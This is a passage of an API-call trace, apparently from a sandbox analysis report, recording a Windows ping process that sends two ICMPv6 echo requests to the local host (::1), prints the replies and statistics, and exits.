ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="啁䑆䍄瑮睘T", ai_addr=0x27b6c0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x27b6e8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x279150*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0163.485] Icmp6CreateFile () returned 0x27fb48 [0163.580] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x27b738 
[0163.580] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x285c00 [0163.580] getnameinfo (in: pSockaddr=0xcf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x1efa9c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0163.580] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x1ef59c, nSize=0x0, Arguments=0x1ef598 | out: lpBuffer="`·'") returned 0x1c [0163.602] CharToOemBuffA (in: lpszSrc="\r\nPinging AUFDDCntXwT [::1] ", lpszDst=0x27b760, cchDstLength=0x1c | out: lpszDst="\r\nPinging AUFDDCntXwT [::1] ") returned 1 [0163.602] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0163.602] _write (in: _FileHandle=1, _Buf=0x27b760*, _MaxCharCount=0x1c | out: _Buf=0x27b760*) returned 28 [0163.602] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0163.603] LocalFree (hMem=0x27b760) returned 0x0 [0163.603] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x1ef5a0, nSize=0x0, Arguments=0x1ef59c | out: lpBuffer="`·'") returned 0x18 [0163.603] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x27b760, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0163.603] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0163.603] _write (in: _FileHandle=1, _Buf=0x27b760*, _MaxCharCount=0x18 | out: _Buf=0x27b760*) returned 24 [0163.603] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0163.603] LocalFree (hMem=0x27b760) returned 0x0 [0163.604] SetConsoleCtrlHandler (HandlerRoutine=0xcf17ca, Add=1) returned 1 [0163.604] Icmp6SendEcho2 (in: IcmpHandle=0x27fb48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x1ef618, DestinationAddress=0xcf55e0, RequestData=0x27b738, RequestSize=0x20, RequestOptions=0x1ef5c8, ReplyBuffer=0x285c00, 
ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x285c00) returned 0x1 [0163.671] getnameinfo (in: pSockaddr=0xcf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x1efa9c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0163.672] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x1ef5a0, nSize=0x0, Arguments=0x1ef59c | out: lpBuffer="`À'") returned 0x10 [0163.672] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x27c060, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0163.672] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0163.672] _write (in: _FileHandle=1, _Buf=0x27c060*, _MaxCharCount=0x10 | out: _Buf=0x27c060*) returned 16 [0163.672] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0163.672] LocalFree (hMem=0x27c060) returned 0x0 [0163.672] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x1ef5a4, nSize=0x0, Arguments=0x1ef5a0 | out: lpBuffer="H\x93'") returned 0x9 [0163.672] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x279348, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0163.672] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0163.672] _write (in: _FileHandle=1, _Buf=0x279348*, _MaxCharCount=0x9 | out: _Buf=0x279348*) returned 9 [0163.672] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0163.672] LocalFree (hMem=0x279348) returned 0x0 [0163.672] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x1ef5a4, nSize=0x0, Arguments=0x1ef5a0 | out: lpBuffer="(ÿ'") returned 0x2 [0163.672] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x27ff28, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0163.672] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0163.672] 
_write (in: _FileHandle=1, _Buf=0x27ff28*, _MaxCharCount=0x2 | out: _Buf=0x27ff28*) returned 2 [0163.672] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0163.672] LocalFree (hMem=0x27ff28) returned 0x0 [0163.672] Sleep (dwMilliseconds=0x3e8) [0164.685] Icmp6SendEcho2 (in: IcmpHandle=0x27fb48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x1ef618, DestinationAddress=0xcf55e0, RequestData=0x27b738, RequestSize=0x20, RequestOptions=0x1ef5c8, ReplyBuffer=0x285c00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x285c00) returned 0x1 [0164.779] getnameinfo (in: pSockaddr=0xcf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x1efa9c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0164.779] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x1ef5a0, nSize=0x0, Arguments=0x1ef59c | out: lpBuffer="`À'") returned 0x10 [0164.779] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x27c060, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0164.779] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0164.779] _write (in: _FileHandle=1, _Buf=0x27c060*, _MaxCharCount=0x10 | out: _Buf=0x27c060*) returned 16 [0164.779] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0164.779] LocalFree (hMem=0x27c060) returned 0x0 [0164.779] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x1ef5a4, nSize=0x0, Arguments=0x1ef5a0 | out: lpBuffer="H\x93'") returned 0x9 [0164.779] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x279348, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0164.779] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0164.779] _write (in: _FileHandle=1, _Buf=0x279348*, _MaxCharCount=0x9 | out: _Buf=0x279348*) returned 9 
[0164.779] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0164.779] LocalFree (hMem=0x279348) returned 0x0 [0164.779] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x1ef5a4, nSize=0x0, Arguments=0x1ef5a0 | out: lpBuffer="(ÿ'") returned 0x2 [0164.779] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x27ff28, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0164.779] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0164.779] _write (in: _FileHandle=1, _Buf=0x27ff28*, _MaxCharCount=0x2 | out: _Buf=0x27ff28*) returned 2 [0164.780] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0164.780] LocalFree (hMem=0x27ff28) returned 0x0 [0164.780] getnameinfo (in: pSockaddr=0xcf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x1ef568, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0164.780] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x1ef538, nSize=0x0, Arguments=0x1ef534 | out: lpBuffer="X}(") returned 0x56 [0164.780] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),\r\n", lpszDst=0x287d58, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),\r\n") returned 1 [0164.780] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0164.780] _write (in: _FileHandle=1, _Buf=0x287d58*, _MaxCharCount=0x56 | out: _Buf=0x287d58*) returned 86 [0164.780] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0164.780] LocalFree (hMem=0x287d58) returned 0x0 [0164.780] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x1ef548, nSize=0x0, Arguments=0x1ef544 | out: lpBuffer="p}(") returned 0x61 [0164.780] 
CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x287d70, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0164.780] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0164.780] _write (in: _FileHandle=1, _Buf=0x287d70*, _MaxCharCount=0x61 | out: _Buf=0x287d70*) returned 97 [0164.780] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0164.780] LocalFree (hMem=0x287d70) returned 0x0 [0164.780] IcmpCloseHandle (IcmpHandle=0x27fb48) returned 1 [0164.872] LocalFree (hMem=0x27b738) returned 0x0 [0164.872] LocalFree (hMem=0x285c00) returned 0x0 [0164.873] WSACleanup () returned 0 [0164.953] exit (_Code=0) Thread: id = 63 os_tid = 0x418 Thread: id = 64 os_tid = 0x804 Thread: id = 65 os_tid = 0x814